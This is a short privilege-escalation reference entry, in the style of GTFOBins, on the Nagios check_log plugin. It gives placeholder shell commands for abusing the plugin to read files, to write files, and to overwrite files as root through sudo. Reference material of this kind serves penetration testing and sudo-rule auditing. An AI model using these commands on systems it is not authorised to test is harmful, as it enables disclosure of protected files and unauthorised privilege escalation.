~/Privilege Escalation/Linux/Binaries# cat check_log.md █
This is the check_log
Nagios plugin, available e.g. in /usr/lib/nagios/plugins/
.
File write
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
LFILE=file_to_write
INPUT=input_file
check_log -F $INPUT -O $LFILE
File read
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file_to_read
OUTPUT=output_file
check_log -F $LFILE -O $OUTPUT
cat $OUTPUT
Sudo
If the binary is allowed to run as superuser by sudo
, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
LFILE=file_to_write
INPUT=input_file
sudo check_log -F $INPUT -O $LFILE